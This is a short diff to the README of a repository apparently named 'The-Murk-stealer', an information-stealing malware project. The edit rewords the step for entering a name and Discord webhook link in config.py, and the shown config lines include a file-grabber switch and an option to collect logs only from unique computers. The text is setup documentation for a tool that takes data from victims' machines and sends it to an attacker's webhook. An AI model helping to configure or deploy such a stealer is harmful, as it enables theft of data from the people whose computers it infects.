Choomai/The-Murk-stealer/README.md

 ### 🔨Building(manually)

 ### 🎮For Discord
-Finally, insert the name and webhook link in the `config\config.py` here
+Insert your name and webhook link in the `config\config.py` here
 ```
 enableFileGrabber = False #enable file grabber
 oneStart = False #enable this if you want logs to come only from unique computers